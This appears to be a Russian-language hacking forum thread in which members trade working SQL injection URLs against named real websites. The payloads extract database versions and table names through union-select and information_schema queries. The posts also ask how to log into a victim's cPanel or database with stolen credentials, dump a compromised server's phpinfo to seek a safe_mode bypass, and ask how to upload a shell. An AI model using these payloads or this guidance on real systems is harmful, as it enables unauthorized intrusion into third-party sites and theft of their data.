Code: http://www.raarfm.com/shows/cinr_suite?id=116'and(1)=(0)union/*!all*/select(1),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,unhex(hex(version())),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,(133)--+ 4.1.14-STANDARD
помогите нубу расскрутить, и если там вообще таблицы http://www.simonsig.co.za/about.php?id=1%27 http://www.ak-47.us/AK47-FAQ.php?id=137
нуб..крути как слепую..или через ошибку выводи..за тебя делать никто ничего не собирается,хотя у второго 3-я версия мускуля...сложно будет для тебя
У меня есть данные от базы на одном сайте. Но phpmyadmin я там не нашел. Просканив сайт , обнаружил только ц.панель. Возможно ли как то зайти в ц-панель или в базу данных. Зная только логин/пароль от самой базы. Сервер локалхост , так что через навикет не пускает. И если кто то знает , может подсказать как генерируются логины для ц панели , то встречал что пароль от базы , такой же как и в ц панеле.
если хостер не разрешил (что обычно ими не разрешается), доступ "откуда-то", ты не сможешь зайти откуда-то в базу, лучше попробуй найти phpmyadmin, если на сайте не найдешь ищу у хостера Например для всех сайтов на hc.ru можно зайти в базу так phpmyadmin.hc.ru
как вывести названия таблиц? http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,table_name+from+information_schema.tables%20where%201=%27
qaz http://mai1-ru.h2m.ru/yyy.php?id=1'+and+false+union+select+1,2,table_name+FrOm+information_schema.tables+limit+1--%201
Code: http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,group_concat%28table_name%29+from+information_schema.tables+--+ Используй substring(group_concat(...),200) для просмотра остальных таблиц, увеличивая число 200 будешь смотреть дальше))
Обход ограничений php safe_mod. Задался целью обойти safe_mod. PHP Version 5.1.6 информация из phpinfo() PHP: System Linux u-host.ru 2.6.9-100.ELsmp #1 SMP Tue Feb 1 12:17:32 EST 2011 i686 Build Date Sep 29 2007 03:15:40 Configure Command './configure' '--host=i686-redhat-linux-gnu' '--build=i686-redhat-linux-gnu' '--target=i386-redhat-linux' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/usr/com' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-curl' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-png' '--with-pspell' '--with-expat-dir=/usr' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--enable-track-vars' '--enable-trans-sid' '--enable-yp' '--enable-wddx' '--with-kerberos' '--enable-ucd-snmp-hack' '--with-unixODBC=shared,/usr' '--enable-memory-limit' '--enable-shmop' '--enable-calendar' '--enable-dbx' '--enable-dio' '--with-mime-magic=/etc/httpd/conf/magic' '--without-sqlite' '--with-libxml-dir=/usr' '--with-mcrypt' '--with-xml' '--with-apxs2=/usr/sbin/apxs' '--without-mysql' '--without-gd' '--without-odbc' '--disable-dom' '--disable-dba' '--without-unixODBC' '--disable- pdo' '--disable-xmlreader' '--disable-xmlwriter' Server API Apache 2.0 Handler Virtual Directory Support disabled Configuration File (php.ini) Path /etc/php.ini Scan this dir for additional .ini files /etc/php.d additional .ini files parsed /etc/php.d/bcmath.ini, /etc/php.d/dba.ini, /etc/php.d/dom.ini, /etc/php.d/gd.ini, /etc/php.d/imap.ini, /etc/php.d/ldap.ini, /etc/php.d/mbstring.ini, /etc/php.d/mysql.ini, /etc/php.d/mysqli.ini, /etc/php.d/ncurses.ini, /etc/php.d/odbc.ini, /etc/php.d/pdo.ini, /etc/php.d/pdo_mysql.ini, /etc/php.d/pdo_odbc.ini, /etc/php.d/pdo_pgsql.ini, /etc/php.d/pdo_sqlite.ini, /etc/php.d/pgsql.ini, /etc/php.d/snmp.ini, /etc/php.d/soap.ini, /etc/php.d/sqlite.ini, /etc/php.d/xmlreader.ini, /etc/php.d/xmlrpc.ini, /etc/php.d/xmlwriter.ini, /etc/php.d/xsl.ini PHP API 20041225 PHP Extension 20050922 Zend Extension 220051025 Debug Build no Thread Safety disabled Zend Memory Manager enabled IPv6 Support enabled Registered PHP Streams php, file, http, ftp, compress.bzip2, compress.zlib, https, ftps Registered Stream Socket Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls Registered Stream Filters string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, convert.iconv.*, bzip2.*, zlib.* PHP Credits Configuration PHP CoreDirective Local Value Master Value allow_call_time_pass_reference Off Off allow_url_fopen On On always_populate_raw_post_data Off Off arg_separator.input & & arg_separator.output & & asp_tags Off Off auto_append_file no value no value auto_globals_jit On On auto_prepend_file no value no value browscap no value no value default_charset no value no value default_mimetype text/html text/html define_syslog_variables Off Off disable_classes no value no value disable_functions ini_restore ini_restore display_errors On On display_startup_errors Off Off doc_root no value no value docref_ext no value no value docref_root no value no value enable_dl On On error_append_string no value no value error_log no value no value error_prepend_string no value no value error_reporting 0 2037 expose_php On On extension_dir /usr/lib/php/modules /usr/lib/php/modules file_uploads On On highlight.bg #FFFFFF #FFFFFF highlight.comment #FF8000 #FF8000 highlight.default #0000BB #0000BB highlight.html #000000 #000000 highlight.keyword #007700 #007700 highlight.string #DD0000 #DD0000 html_errors On On ignore_repeated_errors Off Off ignore_repeated_source Off Off ignore_user_abort On Off implicit_flush Off Off include_path . . log_errors Off Off log_errors_max_len 1024 1024 magic_quotes_gpc Off Off magic_quotes_runtime Off Off magic_quotes_sybase Off Off mail.force_extra_parameters no value no value max_execution_time 60 60 max_input_nesting_level 64 64 max_input_time 60 60 memory_limit 64M 64M open_basedir /var/virtual/www/.ru/httpdocs:/tmp no value output_buffering 4096 4096 output_handler no value no value post_max_size 64M 64M precision 14 14 realpath_cache_size 16K 16K realpath_cache_ttl 120 120 register_argc_argv Off Off register_globals On Off register_long_arrays On Off report_memleaks On On report_zend_debug On On safe_mode On Off safe_mode_exec_dir no value no value safe_mode_gid Off Off safe_mode_include_dir no value no value sendmail_from no value no value sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i serialize_precision 100 100 short_open_tag On On SMTP localhost localhost smtp_port 25 25 sql.safe_mode Off Off track_errors Off Off unserialize_callback_func no value no value upload_max_filesize 64M 64M upload_tmp_dir no value no value user_dir no value no value variables_order EGPCS EGPCS xmlrpc_error_number 0 0 xmlrpc_errors Off Off y2k_compliance On On zend.ze1_compatibility_mode Off Off apache2handlerApache Version Apache/2.0.52 (Red Hat) Apache API Version 20020903 Server Administrator vlad@siteholder.ru Hostname:Port altpark.ru:80 User/Group apache(48)/48 Max Requests Per Child: 2000 - Keep Alive: on - Max Per Connection: 300 Timeouts Connection: 60 - Keep-Alive: 15 Virtual Server Yes Server Root /etc/httpd Loaded Modules core prefork http_core mod_so mod_access mod_auth mod_auth_anon mod_auth_digest mod_include mod_log_config mod_env mod_expires mod_deflate mod_headers mod_usertrack mod_setenvif mod_mime mod_dav mod_status mod_autoindex mod_info mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_userdir mod_alias mod_rewrite mod_cache mod_suexec mod_disk_cache mod_file_cache mod_mem_cache mod_cgi mod_fpcgid mod_jk mod_bw mod_fcgid mod_perl mod_php5 mod_ssl Возможности залить .httpacces нет. часть фаилов читается posix методом. из того что нашел работает только творение от крыса которое позволяет листать дериктории и смотреть какие в них есть фаилы, но отображаются не все.
Ну на наших сайтах , проблемы найти пхпмайадмин нету. А вот на забугорных , 1 к 30 что найду... В этом вся и проблема (
Всем привет!!! Есть скуля вида Возможно ли выполнить системные комманды, или залить шелл. Буду очень благодарен за дельные советы;-)
что то вобще не понимаю как подступиться к скули...посоветуйте плыз http://www.bronx.nl/shop/category.php?cat_id=1+order+by+10--
